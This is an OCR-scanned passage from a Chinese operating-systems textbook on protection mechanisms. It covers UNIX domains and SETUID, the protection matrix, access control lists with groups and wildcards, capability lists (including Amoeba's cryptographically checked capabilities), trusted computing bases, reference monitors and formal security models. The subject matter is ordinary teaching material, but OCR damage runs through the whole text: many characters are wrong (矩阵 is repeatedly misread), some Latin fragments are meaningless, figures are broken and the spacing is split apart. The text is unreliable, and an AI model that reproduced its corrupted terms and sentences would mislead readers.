ELH. AERA (UID, GD) 的 组 合 ， 就 能 够 得 到 可 以 访问 的 所 有 
对 象 列表 文件 ， 包 括 由 特殊 文件 代表 的 VO 设备 等 ) ， 以 及 它们 是 否 
可 以 读 、 写 或 执行 。 使 用 相同 CUID, GID) 组 合 的 两 个 进程 访问 的 是 
完全 一 致 的 对 象 组 合 。 使 用 不 同 CUID, GID) 值 的 进程 访问 的 是 不 同 
的 文件 组 合 ， 虽 然 这 些 文 件 有 大 量 的 重 登 。 





而 且 ， 每 个 UNIX 的 进程 有 两 个 部 分 : 用户 部 分 和 核心 部 分 。 当 执 
行 系统 调用 时 ， 进 程 从 用 户 部 分 切换 到 核心 部 分 。 核 心 部 分 可 以 访问 与 
用 户 部 分 不 同 的 对 象 集 。 例 如 ， 核 心 部 分 可 以 访问 所 有 物理 内 存 的 页 
面 、 整 个 磁盘 和 其 他 所 有 被 保护 的 资源 。 这 样 ， 系 统 调用 就 引发 了 域 切 
换 。 

当 进程 把 SETUID 或 SETGID 位 置 于 on 状态 时 可 以 对 文件 执行 exec 操 


作 ， 这 时 进程 获得 了 新 的 有 效 UID 或 GID 。 不 同 的 CUID, GID) 组 合 会 
产生 不 同 的 文件 和 操作 集 。 使 用 SETUID 或 SETGID 运 行程 序 也 是 一 种 域 








切换 ， 因 为 可 用 的 权限 改变 了 。 








一 个 很 重要 的 问题 是 系统 如 何 跟踪 并 确定 哪个 对 象 属于 哪个 域 。 从 
概念 来 说 ， 至 少 可 以 预想 一 个 大 矩阵 ， 珑 阵 的 行 代表 域 ， 列 代表 对 象 。 
每 个 方块 列 出 对 象 的 域 包含 的 、 可 能 有 的 权限 。 图 9-4 的 窍 阵 如 图 9-5 所 
示 。 有 了 和 矩阵 和 当前 的 域 编写， 系统 就 能 够 判断 是 否 可 以 从 指定 的 域 以 
特定 的 方式 访问 给 定 的 对 象 。 


对 象 
文件 1 文件 2 ”文件 3 文件 4 文件 5 ”文件 6 ”打印 机 1 绘 仪 图 2 


Read 
Read ee Write 
Execute e 
Read 
Write Write Write 
Execute 


图 9-5 保护 矩阵 










域 的 自我 切换 在 矩阵 模型 中 能 够 很 容易 实现 ， 可 以 通过 使 用 操作 
enter 把 域 本 里 作为 对 象 。 图 9-6 再 次 显示 了 图 9-5 的 矩阵 ， 只 不 过 把 3 个 域 
当 作 了 对 象 本 喘 。 域 1 中 的 进程 可 以 切换 到 域 2 中 ， 但 是 一 旦 切换 后 就 不 
能 返回 。 这 种 切换 方法 是 在 UNIX 里 通过 执行 SETUID 程 序 实现 的 。 不 允 
许 其 他 的 域 切换 。 








文件 1 文件 2 文件 3 文件 4 文件 5 文件 6 打印 机 1 给 仪 图 2 域 1 域 2 域 3 





9-6 ”将 域 作为 对 象 的 保护 矩阵 


9.3.2 访问 控制 列表 





在 实际 应 用 中 ， 很 少 会 存储 如 图 9-6 的 矩阵 ， 因 为 矩阵 太 大 、 太 稀 
焉 了。 大 多 数 的 域 都 不 能 访问 大 多 数 的 对 象 ， 所 以 存储 一 个 非常 大 的 、 
几乎 是 空 的 窍 阵 浪费 空间 。 但 是 也 有 两 种 方法 是 可 行 的。 一 种 是 按 行 或 
按 列 存放 ， 而 仅仅 存放 非 空 的 元 素 。 这 两 种 方法 有 着 很 大 的 不 同 。 这 一 
节 将 介绍 按 列 存放 的 方法 ， 下 一 章节 再 介绍 按 行 存放 。 





第 一 种 方法 包括 一 个 关联 于 每 个 对 象 的 (有 序 ) 列表 里 ， 列 表 里 包 
含 了 所 有 可 访问 对 象 的 域 以 及 这 些 域 如 何 访问 这 些 对 象 的 方法 。 这 一 列 
表 叫 做 访问 控制 表 (Access Control List, ACL) ， 如 图 9-7 所 示 。 这 里 
我 们 看 到 了 三 个 进程 ， 每 一 个 都 属于 不 同 的 域 。 A、B 和 C 以 及 三 个 文件 
Fl1、F2 和 F3。 为 了 简便 ， 我 们 假设 每 个 域 相当 于 某 一 个 用 户 ， 即 用 户 
A、B 和 C。 夺 用 通常 的 安全 性 语言 表达 ， 用 户 被 叫做 主体 (subjects 或 
principals) ， 以 便 与 它们 所 拥有 的 对 象 〈 如 文件 ) 区 分 开 来 。 


拥有 者 
用 户 
空间 


内 核 
空间 





图 9-7 用 访问 控制 表 管理 文件 的 访问 


每 个 文件 都 有 一 个 相关 联 的 ACL。 文 件 F1 在 ACL 中 有 两 个 登录 项 
CHIE S Kat) 。 第 一 个 登录 项 表示 任何 用 户 A 拥 有 的 进程 都 可 以 读 写 
文件 。 第 二 个 登录 项 表示 任何 用 户 B 拥 有 的 进程 都 可 以 读 文 件 。 所 有 这 
些 用 户 的 其 他 访问 和 其 他 用 户 的 任何 访问 都 被 禁止 。 请 注意 这 里 的 权限 
是 用 户 赋予 的 ， 而 不 是 进程 。 只 要 系统 运行 了 保护 机 制 ， 用 户 A 拥 有 的 
任何 进程 都 能 够 读 写 文件 F1。 系 统 并 不 在 乎 是 否 有 1 个 还 是 100 个 进程 。 
所 关心 的 是 所 有 者 而 不 是 进程 ID。 








文件 F2 在 ACL 中 有 3 个 登录 项 : A、B 和 C。 它 们 都 可 以 读 文件 ， 而 
且 B 还 可 以 写 文件 。 除 此 之 外 ， 不 允许 其 他 的 访问 。 文 件 F3 很 明显 是 个 
可 执行 文件 ， 因 为 B 和 C 都 可 以 读 并 执行 它 。B 也 可 以 执行 写 操作 。 





这 个 例子 展示 了 使 用 ACL 进 行 保护 的 最 基本 形式 。 在 实际 中 运用 的 


形式 要 复杂 得 多 。 为 了 简便 起 见 ， 我 们 目前 只 介绍 了 3 种 权限 : 读 、 写 
和 执行 。 当 然 还 有 其 他 的 权限 。 有 些 是 一 般 的 权限 ， 可 以 运用 于 所 有 的 
对 象 ， 有 些 是 对 象 特定 的 。 一 般 的 权限 有 destory object 和 copy object. 
这 些 可 以 运用 于 任何 的 对 象 ， 而 不 论 对 象 的 类 型 是 什么 。 与 对 象 有 关 的 
特定 的 权限 会 包括 为 邮箱 对 象 的 append message 和 对 目录 对 象 的 sort 
alphabetically 〈 按 字母 排序 ) 等 。 











到 目前 为 止 ， 我 们 的 ACL 登 录 项 是 针对 个 人 用 户 的 。 许 多 系统 也 文 
AAP (group) 的 概念 。 组 可 以 有 自己 的 名 字 并 包含 在 ACL 中 。 语 
义学 上 组 的 变化 也 是 可 能 的 。 在 某 些 系统 中 ， 每 个 进程 除了 有 用 户 
ID (UID) 外 ， 还 有 组 ID (GID) 。 在 这 类 系统 中 ， 一 个 ACL 登 录 项 包 
括 了 下 列 格式 的 登录 项 : 











UID1,GID1:rights1;UID2,GID2:rights2;... 




















在 这 样 的 条 件 下 ， 当 出 现 要 求 访问 对 象 的 请 求 时 ， 必 须 使 用 调用 者 
的 UID 和 GID 来 进行 检查 。 如 果 它 们 出 现在 ACL 中 ， 所 列 出 的 权限 就 是 
ATM. WE CUID, GID) 的 组 合 不 在 列表 中 ， 访 问 就 被 拒绝 。 


使 用 组 的 方法 就 引入 了 角色 Cole) 的 概念 。 如 在 某 次 系统 安装 
后 ，Tana 是 系统 管理 员 ， 在 组 里 是 sysadm。 但 是 假设 公司 里 也 有 很 多 为 
员工 组 织 的 俱乐部 ， 而 Tana 是 养 镶 爱 好 者 的 一 员 。 俱 乐 部 成 员 属 于 
pigfan 组 并 可 访问 公司 的 计算 机 来 管理 饱 子 的 数据 。 那 么 ACL 中 的 一 部 











分 会 如 图 9-8 所 示 。 








| Password 
Pigeon_data 














ES heal - | 
bill, pigfan: RW; tana, pigfan: RW; … | 


图 9-8 两 个 访问 控制 列表 


如 果 Tana 想 要 访问 这 些 文件 ， 那 么 访问 的 成 功 与 否 将 取决 于 她 当前 
所 登录 的 组 。 当 她 登录 的 时 候 ， 系 统 会 让 她 选择 想 使 用 的 组 ， 或 者 提供 
不 同 的 登录 名 和 密码 来 区 分 不 同 的 组 。 这 一 措施 的 目的 在 于 阻止 Tana 在 
使 用 养 镶 爱 好 者 组 的 时 候 获得 密码 文件 。 只 有 当 她 登录 为 系统 管理 员 时 
才 可 以 这 么 做 。 











在 有 些 情况 下 ， 用 户 可 以 访问 特定 的 文件 而 与 当前 登录 的 组 无 关 。 
这 样 的 情况 将 引入 通配符 Gwildcard) 的 概念 ， 即 “任何 组 ”的 意思 。 
如 ， 蜜 码 文件 的 登录 项 





tana, *:RW 








会 给 Tana 访 问 的 权限 而 不 管 她 的 当前 组 是 什么 。 





但 是 另 一 种 可 能 是 如 果 用 户 属 于 任何 一 个 尘 有 特定 权限 的 组 ， 访 问 
就 被 允许。 这 种 方法 的 优点 是 ， 属 于 多 个 组 的 用 户 不 必 在 登录 时 指定 组 
的 名 称 。 所 有 的 组 都 被 计算 在 内 。 同 时 它 的 缺点 是 几乎 没有 提供 什么 封 








装 性 : Tana 可 以 在 召开 养 镶 俱乐部 会 议 时 编辑 密码 文件 。 


组 和 通配符 的 使 用 使 得 系统 有 可 能 有 选择 地 阻止 用 户 访问 某 个 文 
件 。 如 ， 登 录 项 


virgil,*: (none) ;*,*:RW 





给 Virgil 之 外 的 登录 项 以 读 写 文件 的 权限 。 上 述 方法 是 可 行 的 ， 因 
为 登录 项 是 按 顺 序 扫描 的 ， 只 要 第 一 个 航 采 用 ， 后 续 的 登录 项 就 不 需要 
再 检查 。 在 第 一 个 登录 项 中 为 Virgil 找 到 了 匹配 ， 然 后 找到 并 应 用 这 个 
存 取 权 限 ， 在 本 例 中 为 none〉。 整 个 查找 在 这 时 就 中 断 了 。 实 际 上 ， 
再 也 不 去 检查 剩 下 的 访问 权限 了 。 








还 有 一 种 处 理 组 用 户 的 方法 ， 无 须 使 用 包含 CUID, GID) 对 的 
ACL 登 录 项 ， 而 是 让 每 个 登录 项 成 为 UID 或 GID。 如 ， 一 个 进入 文件 


pigeon_data 的 登录 项 是 : 





debbie:RW; phil:RW; pigfan:RW 





表示 debbie、phil 以 及 其 他 所 有 pigfan 组 里 的 成 员 都 可 以 读 写 该 文 
件 。 





有 时 候 也 会 发 生 这 样 的 情况 ， 即 一 个 用 户 或 组 对 特定 文件 有 特定 的 
许可 权 ， 但 文件 的 所 有 者 稍 后 义 会 收回 。 通 过 访问 控制 列表 ， 收 回 过 去 








赋予 的 访问 权 相 对 比较 简单 。 这 只 要 编辑 ACL 就 可 以 修改 了 。 但 是 如 采 
ACL 仅 仅 在 打开 某 个 文件 时 才 会 检查 ， 那 么 改变 它 以 后 的 结果 就 只 有 在 
将 来 调用 open 命 令 时 才能 委 效 。 对 于 已 经 打开 的 文件 ， 惑 会 仍然 持 有 原 
来 打开 时 拥有 的 权限 ， 即 使 用 户 已 经 不 再 具有 这 样 的 权限 。 


9.3.3 权能 





男 一 种 切 分 图 9-6 和 矩阵 的 方法 是 按 行 存储 。 在 使 用 这 种 方法 的 时 
候 ， 与 每 个 进程 关联 的 是 可 访问 的 对 象 列 表 ， 以 及 每 个 对 象 上 可 执行 操 
作 的 指示 。 这 一 栏 叫做 权能 字 列 表 (capability list 或 C-list) ， 而 且 每 个 
单独 的 项 目 叫做 权能 字 (Dennis 和 Van Hom, 1966; Fabry,1974) 。 一 
个 3 进程 集 和 它们 的 权能 字 列 表 如 图 9-9 所 示 。 





权能 字 列 表 





图 9-9 在 使 用 权能 字 时 ， 每 个 进程 都 有 一 个 权能 字 列 表 





每 一 个 权能 字 赋 予 所 有 者 针对 特定 对 象 的 权限 。 如 在 图 9-9 中 ， 用 
户 A 所 拥有 的 进程 可 以 读 文件 F1 和 F2。 一 个 权能 字 通 常 包 含 了 文件 (或 
者 更 一 般 的 情况 下 是 一 个 对 象 ) 的 标识 符 和 用 于 不 同 权限 的 位 图 。 在 类 
似 UNIX 的 系统 中 ， 文 件 标识 符 可 能 是 i 节 点 号 。 权 能 字 列 表 本 喘 也 是 对 














象 ， 也 可 以 从 其 他 权能 字 列 表 处 指定 ， 这 样 束 有 助 于 共 衬 子 域 。 


很 明显 权能 字 列 表 必 须 防 止 用 户 进 行 算 改 。 已 知 的 保护 方法 有 三 
种 。 第 一 种 方法 需要 建立 带 标记 的 体系 结构 (tagged architecture) ， 在 
这 种 人 硬件 设计 中 ， 每 个 内 存 字 节 必须 拥有 额外 的 位 《或 标记 ) 来 判断 该 
字 节 是 否 包 含 了 权限 字 。 标 记 位 不 能 被 算术 、 比 较 或 相似 的 指令 使 用 ， 
它 仅 可 以 被 在 核心 态 下 运行 的 程序 修改 〈 如 操作 系统 ) 。 人 们 已 经 构造 
了 和 带 标记 体系 结构 的 计算 机 ， 并 可 以 稳定 地 运行 (Feustal，1972) 。 
IBM AS/400 融 是 一 个 公认 的 例子 。 











第 二 种 方法 是 在 操作 系统 里 保存 权能 字 列 表 。 随 后 根据 权能 字 在 列 
表 中 的 位 置 引 用 权能 字 。 某 个 进程 也 许 会 说 : “从 权能 字 2 所 指向 的 文件 
中 读 取 1KB”。 这 种 寻 址 方法 有 些 类 似 UNIX 里 的 文件 描述 符 。 
Hydra (Wulf 等 人 ，1974) 采用 的 就 是 这 种 方法 。 











第 三 种 方法 是 把 权能 字 列 表 放 在 用 户 空 间 里 ， 并 用 加 密 方 法 进行 管 
理 ， 这 样 用 户 残 不 能 算 改 它们 。 这 种 方法 特别 适合 分 布 式 操作 系统 ， 并 
可 按 下 述 的 方式 工作 。 当 客户 进程 发 送 消息 到 远程 服务 器 〈 如 一 人 台 文 件 
服务 器 ) 时 ， 请 求 为 目 己 创建 一 个 对 象 时 ， 服 务 需 会 在 创建 对 象 的 同时 
创建 一 条 长 随机 码 作为 校 验 字 段 附 在 该 对 象 上 。 文 件 服务 器 为 对 象 预 留 
了 槽 口 ， 以 便 存 放 校 验 字 段 和 磁盘 虱 区 地 址 等 。 在 UNIX 术 语 中 ， 校 验 
字段 被 存放 在 服务 器 的 i 点 中 。 校 验 字 段 不 会 返回 用 户 ， 也 决 不 会 家 
放 在 网 络 上 。 服 务 占 会 生成 并 回 送 给 用 户 如 图 9-10 格 式 的 权能 字 。 








图 9-10 采用 了 客 码 保护 的 权能 字 





返回 给 用 户 的 权能 字 包 括 服务 器 的 标识 从 、 对 象 写 〈 服 务 器 列表 索 
引 ， 主 要 是 i-node 码 ) 以 及 以 位 图 形式 存放 的 权限 。 对 一 个 新 建 的 对 象 
来 说， 所 有 的 权限 位 都 是 处 于 打开 状态 的 ， 这 显然 是 因为 该 对 象 的 拥有 
者 有 权限 对 该 对 象 做 任何 事情 。 最 后 的 字段 包含 了 对 象 、 权 限 以 及 校 验 
字段 。 校 验 字段 运行 在 通过 密码 体制 保护 的 单 铝 函数 {上 ， 我 们 已 经 讨 
论 过 这 种 函数 。 




















当 用 户 想 访问 对 象 时 ， 痛 先 要 把 权能 字 作 为 友 送 请 求 的 一 部 分 传送 
到 服务 器 。 然 后 服务 器 提取 对 象 编号 并 通过 服务 器 列表 索引 找到 对 象 。 
Fit See OS, MIR, BOI) 。 前 两 个 参数 来 目 于 权能 字 本 号 ， 而 第 
三 个 参数 来 目 于 服务 需 表 。 如 末 计 算 值 符合 权能 字 的 第 四 个 字段 ， 请 求 
就 被 接受 ， 否 则 被 拒绝 。 如 果 用 户 想 要 访问 其 他 人 的 对 象 ， 他 就 不 能 伪 
造 第 四 个 域 的 值 ， 因 为 他 不 知道 校 验 字段 ， 所 以 请 求 将 被 拒绝 。 

















用 户 可 以 要 求 服务 器 建立 一 个 较 轮 的 权能 字 ， 如 只 读 访 问 。 服 务 器 
首先 检查 权能 字 的 合法 性 ， 检 杜 成 功 则 计算 f OTR, SIN DUR, Be 
验 ) 并 产生 新 的 权能 字 放 入 第 四 个 字段 中 。 请 注意 原来 的 校 验 值 仍 在 使 
用 ， 因 为 其 他 较 强 的 权能 字 仍 然 需 要 该 校 验 值 。 








新 的 权能 字 被 被 发 送 回 请 求 进程 。 现 在 用 户 可 以 在 消息 中 附加 该 权 
能 字 发 送 到 朋友 处 。 如 果 朋 友 打 开 了 应 该 被 关闭 的 权限 位 ， 服 务 器 就 会 
在 使 用 权限 字 时 检测 到 ， 因 为 { 的 值 与 错误 的 权限 位 不 能 对 应 。 既 然 朋 
友 不 知道 真正 的 校 验 字段 ， 他 就 不 能 伪造 与 错误 的 权限 位 相对 应 的 权能 
字 。 这 种 方法 最 早 是 由 Amoeba 系 统 开发 的 ， 后 被 广泛 使 用 〈Tanenbaum 
等 人 ,1990) 。 





除了 特定 的 与 对 象 相关 的 权限 《如 读 和 执行 操作 ) 外 ， 权 能 字 中 
《包括 在 核心 态 和 密码 保护 模式 下 ) 通常 包含 一 些 可 用 于 所 有 对 象 的 普 
通 权限 。 这 些 普 通 权限 有 : 


1 复制 权能 字 : 为 同一 个 对 象 创 建新 的 权能 字 。 





2) 复 制 对 象 : 用 新 的 权能 字 创 建 对 象 的 副本 。 





3) 移 除权 能 字 : 从 权能 字 列 表 中 删 去 登录 项 ， 不 影响 对 象 。 
4) 销 毁 对 象 : 永久 性 地 移 除 对 象 和 权能 字 。 


最 后 值得 说 明 的 是 ， 在 核心 管理 的 权能 子 系统 中 ， 撤 回 对 对 象 的 访 
问 是 十 分 困难 的 。 系 统 很 难为 任意 对 象 找到 它 所 有 显著 的 权能 字 并 撤 
回 ， 因 为 它们 存储 在 磁盘 各 处 的 权能 字 列 表 中 。 一 种 办 法 是 把 每 个 权能 
字 指 向 间接 的 对 象 ， 而 不 是 对 象 本 刁 。 表 把 间接 对 象 指 向 真 正 的 对 象 ， 
这 样 系统 束 能 打 断 连接 关系 使 权能 字 无 效 。〈 当 指 癌 间接 对 象 的 权能 字 











后 来 出 现在 系统 中 时 ， 用 户 将 发 现 间 接 对 象 指 癌 的 是 一 个 空 的 对 象 。) 


在 Amoeba 系 统 结 构 中 ， 撤 回 权 能 字 是 十 分 容易 的 。 要 做 的 仅仅 是 
改变 存放 在 对 象 里 的 校 验 字段 。 只 要 改变 一 次 束 可 以 使 所 有 的 失效 。 但 
征 没 有 一 种 机 制 可 以 有 选择 性 地 撤回 权能 字 ， 如 ， 仅 撤回 Jonn 的 许可 
权 ， 但 不 撤回 任何 其 他 人 的 。 这 一 缺陷 也 被 认为 是 权限 系统 的 一 个 主要 


问题 。 














为 一 个 主要 问题 是 确保 合法 权能 字 的 拥有 者 不 会 给 他 最 好 的 朋友 
1000 个 副本 。 采 用 核心 管理 权能 字 的 模式 ， 如 Hydra 系 统 ， 这 个 问题 得 
到 解决 。 但 在 如 Amoeba 这 样 的 分 布 式 系统 中 却 无 法 解决 这 个 问题 。 





劝 一 方面 ， 权 能 字 非 常 漂亮 地 解决 了 移动 代码 的 沙 盒 问 题 。 当 外 来 
程序 开始 运行 时 ， 给 出 的 权能 字 列 表 里 只 包含 了 机 顺 所 有 者 想 要 给 的 权 
能 ， 如 在 屏幕 上 进行 写 操作 以 及 在 刚 创 建 的 临时 目录 里 读 写 文件 的 权 
利 。 如 果 移 动 代 码 和 被 放 进 了 目 己 的 只 拥有 这 些 有 限 权 能 的 进程 中 ， 就 无 
法 访问 其 他 任何 资源 ， 相 当 于 被 有 效 地 限制 在 了 沙 盒 里 。 这 种 方法 不 需 
要 修改 代码 ， 也 不 需要 解释 性 执行 。 当 运行 的 代码 拥有 所 需 的 最 少 访问 
权时 ， 符 合 了 最 小 特权 规则 ， 这 也 是 建立 安全 操作 系统 的 方针 。 





9.3.4 可 信 系 统 





人 们 总 是 可 以 从 各 种 渠道 中 获得 关于 病毒 、 蠕 虫 以 及 其 他 相关 的 消 
恩 。 天 真 的 人 可 能 会 问 下 面 两 个 问题 : 





1) 建 立 一 个 安全 的 操作 系统 有 可 能 吗 ? 
2) 如 末 可 能 ， 为 什么 不 去 做 呢 ? 


第 一 个 问题 的 答案 原则 上 是 肯定 的 。 如 何 建立 安全 系统 的 答案 人 们 
数 十 年 前 束 知 道 了 。 例 如 ， 在 20 世 纪 60 年 代 设 计 的 MULTICS 就 把 安全 
作为 主要 目标 之 一 而 且 做 得 非常 好 。 


为 什么 不 建立 一 个 安全 系统 是 一 个 更 为 复杂 的 问题 ， 主 要 原因 有 两 
个 。 首 先 ， 现 代 系 统 虽 然 不 安全 但 是 用 户 不 愿 抛弃 它们 。 假 设 Microsoft 
宣布 除了 Windows 外 还 有 一 个 新 的 SecureOS 产 品 ， 并 保证 不 会 受到 病毒 
感染 但 不 能 运行 Windows 应 用 程序 ， 那 么 很 少 会 有 用 户 和 公司 把 
Windows 像 个 学 手 山芋 一 样 扔 掉 转 而 立即 购买 新 的 系统 。 事 实 上 
Microsoft 的 确 有 一 款 SecureOS (Fandrich 等 人 ,2006) ， 但 是 并 没有 投入 
商业 市 场 。 





第 二 个 原因 更 敏感 。 现 在 已 知 的 建立 安全 系统 仅 有 的 办 法 是 保持 系 
统 的 简单 性 。 特 性 是 安全 的 大 敌 。 系 统 设 计 师 相信 【无 论 是 正确 还 是 错 





TRAD 用 户 所 想 要 的 是 更 多 的 特性 。 更 多 的 特性 意味 着 更 多 的 复杂 性 ， 
更 多 的 代码 以 及 更 多 的 安全 性 错误 。 





这 里 有 两 个 简单 的 例子 。 最 早 的 电子 邮件 系统 通过 ACSII 文 本 及 送 
消息 。 它 们 是 完全 安全 的 。ASCII 文 本 不 可 能 对 计算 机 系统 造成 损失 。 
然后 人 们 想方设法 扩展 电子 邮件 的 功能 ， 引 入 了 其 他 类 型 的 文档 ， 如 可 
以 包含 宏 程 序 的 Word 文 件 。 读 这 样 的 文件 意味 着 在 自己 的 计算 机 上 运 
行 别人 的 程序 。 无 论 沙 盒 怎么 有 效 ， 在 上 自己 的 计算 机 上 运行 别人 的 程序 
必定 比 ASCII 文 本 要 危险 得 多 。 是 用 户 要 求 从 过 去 的 文本 格式 改 为 现在 
的 活动 程序 吗 ? 大 概 不 是 吧 ， 但 系统 设计 人 员 认 为 这 是 个 极 好 的 主意 ， 
而 没有 考虑 到 隐 含 的 安全 问题 。 

















第 二 个 例子 是 关于 网 页 的 。 过 去 的 HTML 网 页 没有 造成 大 的 安全 问 
题 (虽然 非法 网 页 也 可 能 导致 绥 冲 洲 出 攻击 ) 。 现 在 许多 网 页 都 包含 了 
可 执行 程序 (Applet〉， 用 户 不 得 不 运行 这 些 程序 来 浏览 网 页 内 容 ， 结 
果 一 个 又 一 个 安全 漏洞 出 现 了 。 即 便 一 个 漏洞 被 补 上 ， 又 会 有 新 的 漏洞 
显现 出 来 。 当 网 页 完全 是 静态 的 时 候 ， 是 用 户 要 求 增加 动态 内 容 的 吗 ? 
可 能 动态 网 页 的 设计 者 也 记 不 得 了 ， 但 随 之 而 来 是 大 量 的 安全 问题 。 这 
有 点 像 负责 说 “不 ”的 副 总 统 在 车 轮 下 睡 着 了 。 
































实际 上 ， 确 实 有 些 组 织 认 为 ， 与 非常 漂亮 的 新 功能 相 比 ， 好 的 安全 
性 更 为 重要 。 苗 方 组 织 就 是 一 个 重要 的 例 于 。 在 接 下 来 的 几 节 中 ， 我 们 
将 研究 相关 的 一 些 问题 ， 不 过 这 些 问 题 不 是 儿 句 话 便 能 说 清楚 的 。 要 构 





建 一 个 安全 的 系统 ， 需 要 在 操作 系统 的 核心 中 实现 安全 模型 ， 且 该 模型 
要 非 第 简单 ， 从 而 设计 人 员 确 实 能 够 理解 模型 的 内 涵 ， 并 且 顶 住所 有 压 
力 ， 避 免 偏 离 安全 模型 的 要 求 去 添加 新 的 功能 特性 。 


9.3.5 Hite 





在 安全 领域 中 ， 人 们 通常 讨论 可 信 系 统 而 不 是 安全 系统 。 这 些 系统 
在 形式 上 申明 了 安全 要 求 并 满足 了 这 些 安全 要 求 。 每 一 个 可 信 系 统 的 核 
心 是 最 小 的 可 信 计 算 基 (Trusted Computing Base, TCB) ， 其 中 包含 了 
实施 的 所 有 安全 规则 所 必需 的 硬件 和 软件 。 如 果 这 些 可 信 计 算 基 根据 系 
统 规约 工作 ， 那 么 ， 无 论 发 生 了 什么 错误 ， 系 统 安全 性 都 不 会 受到 威 
胁 。 








典型 的 TCB 包 括 了 大 多 数 的 硬件 (除了 不 影响 安全 性 的 VO 设 
备 ) 、 操 作 系 统 核心 的 一 部 分 、 大 多 数 或 所 有 掌握 超级 用 户 权 限 的 用 户 
程序 〈 如 在 UNIX 中 的 SETUID 根 程序 ) 。 必 须 包含 在 操作 系统 中 的 TCB 
功能 有 : 进程 创建 、 进 程 切换 、 内 存 页 面 管理 以 及 部 分 的 文件 以 及 IO 
管理 。 在 安全 设计 中 ， 为 了 减少 空间 以 及 纠正 错误 ，TCB 通 常 完 全 独立 
于 操作 系统 的 其 他 部 分 。 





TCB 中 的 一 个 重要 组 成 部 分 是 引用 监视 器 ， 如 图 9-11 所 示 。 引 用 监 
视 器 接受 所 有 与 安全 有 关 的 系统 请 求 〈《 如 打开 文件 等 ) ， 然 后 决定 是 否 
允许 运行 。 引 用 监视 嚣 要求 所 有 的 安全 问题 决策 都 必须 在 同一 处 考虑 ， 
而 不 能 跳 过 。 大 多 数 的 操作 系统 并 不 是 这 样 设计 的 ， 这 也 是 它们 导致 不 
安全 的 部 分 原因 。 








用 户 进 程 


用 户 空间 
所 有 系统 调用 通过 访问 
监视 器 进行 安全 检查 
访问 监视 器 
内 核 空间 





可 信 计 算 基准 





图 9-11 引用 监视 器 





现今 安全 研究 的 一 个 目标 是 将 可 信 计 算 基 中 数 百 万 行 的 代码 缩短 为 
只 有 数 万 行 代码 。 在 图 1-26 中 我 们 看 到 了 MINIX 3 操作 系统 的 结构 。 
MINIX 3 是 具有 POSIX 兼 容 性 的 系统 ， 但 又 与 Linux 或 FreeBSD 有 着 完全 
不 同 的 结构 。 在 MINIX 3 中 ， 只 有 4000 行 左右 的 代码 在 内 核 中 运行 。 其 
余部 分 作为 用 户 进程 运行 。 其 中 ， 如 文件 系统 和 进程 管理 器 是 可 信 基 的 
一 部 分 ， 因 为 它们 与 系统 安全 息息相关 ; 但 是 诸如 打印 机 驱动 和 音频 驱 
动 这 样 的 程序 并 不 作为 可 信 计 算 库 的 一 部 分 ， 因 为 不 管 这 些 程序 出 了 什 
么 问题 ， 它 们 的 行为 也 不 可 能 危及 系统 安全 。MINIX 3 将 可 信 计 算 库 的 
代码 量 减 少 了 两 个 数量 级 ， 从 而 潜在 地 比 传统 系统 设计 提供 了 更 高 的 安 
BENE 


























9.3.6 ”安全 系统 的 形式 化 模型 





诸如 图 9-5 的 保护 矩阵 并 不 是 静态 的 。 它 们 通常 随 着 创建 新 的 对 
象 ， 销 毁 旧 的 对 象 而 改变 ， 而 且 所 有 者 决定 对 象 的 用 户 集 的 增加 或 限 
制 。 人 们 把 大 量 的 精力 花费 在 建立 安全 系统 模型 ， 这 种 模型 中 的 保护 算 
阵 处 于 不 断 的 变化 之 中 。 在 本 节 的 稍 后 部 分 ， 我 们 将 简单 介绍 这 方面 的 
工作 原理 。 














几 十 年 前 ，Harrison 等 人 〈1976) 在 保护 矩阵 上 确定 了 6 种 最 基本 的 
操作 ， 这 些 操作 可 用 于 任何 安全 系统 模型 的 基准 。 这 些 最 基本 的 操作 是 
create object, delete object, create domain, delete domain, insert right 和 
remove right。 最 后 的 两 种 插入 和 删除 权限 操作 来 自 于 特定 的 矩阵 单元 ， 
如 赋予 域 1 读 文件 6 的 许可 权 。 





上 述 6 种 操作 可 以 合并 为 保护 命令 。 用 户 程 序 可 以 运行 这 些 命令 来 
改变 保护 和 矩阵。 它们 不 可 以 直接 执行 最 原始 的 操作 。 例 如 ， 系 统 可 能 有 
一 个 创建 新 文件 的 命令 ， 该 命令 首先 碍 看 该 文件 是 否 已 存在 ， 如 果 不 存 
在 就 创建 新 的 对 象 并 赋予 所 有 者 相应 的 权限 。 当 然 也 可 能 有 一 个 命令 允 
许 所 有 者 赋予 系统 中 所 有 用 户 读 取 该 文件 的 权限 。 实 际 上 ， 只 要 
把 * 读 ”权限 插入 到 每 个 域 中 该 文件 的 登录 项 即 可 。 














此 刻 ， 保 护 和 矩阵 决定 了 在 任何 域 中 的 一 个 进程 可 以 执行 哪些 操作 ， 


而 不 是 被 授权 执行 哪些 操作 。 甜 阵 是 由 系统 来 强制 的 ， 而 授权 与 管理 策 
略 有 关 。 为 了 说 明 其 差别 ， 我 们 看 一 看 图 9-12 域 与 用 户 相 对 应 的 例子 。 
在 图 9-12a 中 ， 我 们 看 到 了 既定 的 保护 策略 : Henry 可 以 读 写 mailbox7， 
Robert 可 以 恋 写 secret， 所 有 的 用 户 可 以 读 和 运行 compiler。 





对 象 对 象 


Compiler Mailbox 7 Secret Compiler Mailbox 7 Secret 





图 9-12 a) 授 权 后 的 状态 ; b) 未 授权 的 状态 


现在 假设 Robert 非 常 聪明 ， 并 找到 了 一 种 方法 及 出 命令 把 保护 矩阵 
改 为 如 图 9-12b 所 示 。 现 在 他 就 可 以 访问 mailbox7 了 ， 这 是 他 本 来 未 修 授 
权 的 。 如 果 他 想 读 文件 ， 操 作 系 统 束 可 以 执行 他 的 请 求 ， 因 为 操作 系统 
并 不 知道 图 9-12b 的 状态 是 未 被 授权 的 。 





很 明显 ， 所 有 可 能 的 窍 阵 被 划分 为 两 个 独立 的 集合 : 所 有 处 于 授权 
状态 的 集合 和 所 有 未 授权 的 集合 。 经 过 大 量 理论 上 的 研究 后 会 有 这 样 一 
个 问题 ， 给 定 一 个 最 原始 的 授权 状态 和 命令 集 ， 是 否 能 证 明 系 统 永远 不 


能 达到 未 授权 的 状态 ? 


实际 上 ， 我 们 是 在 询问 可 行 的 安全 机 制 (保护 命 令 ) 是 否 足 以 强制 
某 些 安 全 策略 。 给 定 了 这 些 安 全 策略 、 最 初 的 矩阵 状态 和 改变 这 些 算 阵 
的 命令 集 ， 我 们 希望 可 以 找到 建立 安全 系统 的 方法 。 这 样 的 证 明 过 程 是 
非常 困难 的 : 许多 一 般 用 途 的 系统 在 理论 上 是 不 安全 的 。Harrison 等 人 
